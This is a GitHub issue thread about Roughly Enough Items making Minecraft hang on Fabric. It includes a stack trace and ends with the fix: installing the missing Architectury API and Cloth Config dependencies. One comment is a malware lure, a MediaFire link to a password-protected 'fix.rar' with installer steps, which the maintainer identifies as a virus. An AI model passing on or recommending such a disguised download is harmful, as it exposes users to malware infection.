### ISSUE TITLE
Minecraft don't starts with this mod in folder

### ISSUE THREAD

**Issue by GauravChauhan4795** [shedaniel/RoughlyEnoughItems#1715]
### What happened?

my minecraft runs smoothly but as soon as i add this into the mods folder it just gets stuck at a white screen and while looking at my console i see error logs that i have provided below

### What mod loaders are you seeing the problem on?

Fabric

### What do you think this bug is of?

- [ ] Visual
- [ ] Recipe Lookup
- [ ] Cheat Mode
- [ ] Plugin Integration / JEI Plugin Compatibility
- [X] Others

### Relevant log output

```shell
at me.shedaniel.errornotifier.fabric.ErrorNotifierPlatformImpl.lambda$getResourceResolver$0(ErrorNotifierPlatformImpl.java:30)
	at me.shedaniel.errornotifier.launch.EarlyGraphics.lambda$registerTexture$0(EarlyGraphics.java:178)
	at me.shedaniel.errornotifier.launch.EarlyGraphics.registerTexture(EarlyGraphics.java:185)
	at me.shedaniel.errornotifier.launch.EarlyGraphics.registerTexture(EarlyGraphics.java:178)
	at me.shedaniel.errornotifier.launch.EarlyGraphics._bindTexture(EarlyGraphics.java:204)
	at me.shedaniel.errornotifier.launch.EarlyGraphics.bindTexture(EarlyGraphics.java:106)
	at me.shedaniel.errornotifier.client.DynamicErrorFreeEntryListWidget.renderBackBackground(DynamicErrorFreeEntryListWidget.java:122)
	at me.shedaniel.errornotifier.client.DynamicErrorFreeEntryListWidget.render(DynamicErrorFreeEntryListWidget.java:132)
	at me.shedaniel.errornotifier.client.ErrorRenderer.render(ErrorRenderer.java:42)
	at me.shedaniel.errornotifier.launch.EarlyWindow.render(EarlyWindow.java:235)
	at me.shedaniel.errornotifier.launch.EarlyWindow.renderWindow(EarlyWindow.java:226)
	at me.shedaniel.errornotifier.launch.EarlyWindow.start(EarlyWindow.java:204)
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)
	at java.base/java.lang.reflect.Method.invoke(Method.java:580)
	at me.shedaniel.errornotifier.ErrorNotifier.init(ErrorNotifier.java:43)
	at me.shedaniel.errornotifier.fabric.ErrorNotifierFabric.onPreLaunch(ErrorNotifierFabric.java:11)
	at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:384)
	at net.fabricmc.loader.impl.launch.knot.Knot.init(Knot.java:160)
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:68)
	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)
java.lang.RuntimeException: Resource not found: /assets/minecraft/textures/gui/options_background.png
```

### By submitting this issue, I have included the necessary logs by pasting the contents into the correct location or attaching the file as an upload.

- [X] Yes, and I did not use any paste services other than GitHub Gists.

### By submitting this issue, I have confirmed my REI and REI's dependencies are up to date.

- [X] Yes

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rozbrajaczpoziomow** [comment]
do not.

**Comment by GauravChauhan4795** [comment]
do not what?
that mediafire sent by some random?

**Comment by shedaniel** [comment]
Do **NOT** download and run random executables from the internet
They could be viruses (they are in this case), this is Internet 101.

**Comment by GauravChauhan4795** [comment]
i know that then how do i fix this can you tell please i verified all resources can't get it to work

**Comment by lineargraph** [comment]
This is probably yet another case of https://github.com/shedaniel/error-notifier/issues/3 (Minecraft removed the resource that error notifier uses as a background).

The user facing fix here is to add REIs dependencies (cloth config and architectury i think). Usually fabric would show this, but REI uses error notifier instead which is supposed to "provide a better error screen" (which has not been working for a good few months by now while fabrics has continued to work just fine).

**Comment by GauravChauhan4795** [comment]
Thanks! i was checking my folder for dependencies and i was missing architectury api for which it uses error notifier but it wasn't able to process its broken smh. Simple fix is to add fabric,cloth config and architectury api along with this mod
